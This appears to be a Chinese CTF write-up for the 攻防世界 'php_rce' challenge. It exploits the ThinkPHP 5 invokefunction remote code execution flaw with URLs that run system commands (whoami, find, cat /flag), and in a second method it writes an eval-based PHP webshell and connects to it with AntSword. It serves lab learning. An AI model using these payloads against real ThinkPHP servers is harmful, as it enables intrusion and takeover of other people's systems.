当前位置: 首页 > news >正文

攻防世界17-php_rce-CTFWeb进阶

攻防世界17-php_rce-CTFWeb进阶

image-20241012203810232

这题没什么头绪,还以为是个广告,提到了ThinkPHPV5,和phprce,可以去查一下

image-20241012203908835

找到了一些帖子,看一下

解法1:

发现了这么一个用法:

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以替换一些指令,ls查看没看到一些有用的信息,我用find指令去看看find / -type f -name ‘flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -type f -name ‘flag

image-20241012204302471

找到这个cat一下

http://61.147.171.105:55394//index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

image-20241012204333667

flag{thinkphp5_rce}

解法2:

发现这个漏洞还可以这样利用

http://61.147.171.105:55394///index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=xxx

可以插入webshell,一句话木马

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>

连接蚁剑

image-20241012204836159

找到flag

中…(img-qtPCsLC7-1728786701966)]

找到flag

image-20241012204915049


http://www.mrgr.cn/news/49153.html

相关文章:

  • 算法_校园最短路径漫游设计
  • 拆解学习【STC宏晶MCU-CM1020电池保护】(一)
  • rpc中常用的数据格式:Protobuf 图文详解
  • 股票做T如何选择买卖点,股票做T时,怎样综合判断买卖点?
  • 连接数据库和基本信息查询的详细理解和实际操作
  • 从0到1,一篇文章彻底讲透AI的Token到底是什么?如何实际应用
  • 深入理解 Transformer:构建先进 NLP 模型的关键技术
  • 物联网5G模块WIFI模块调式记录(Pico)
  • 【JAVA-数据结构】二叉树
  • 一个月学会Java 第13天 抽象类与接口
  • 如何将docker容器中的软件安装到singularity容器中?
  • 联合查询(详细篇)
  • MediaRecorder + Camera2循环录制视频
  • 企业架构之从理论指南到实践指导企业数字化转型
  • 将图片添加到 PDF 的 5 种方法
  • 架构设计笔记-8-系统质量属性与架构评估
  • SSH隧道验证的原理及实现例子
  • E40.【C语言】练习:有关栈帧的讨论(反汇编分析)
  • 基于Raspberry Pi人脸识别自动门
  • C++中单例推荐写法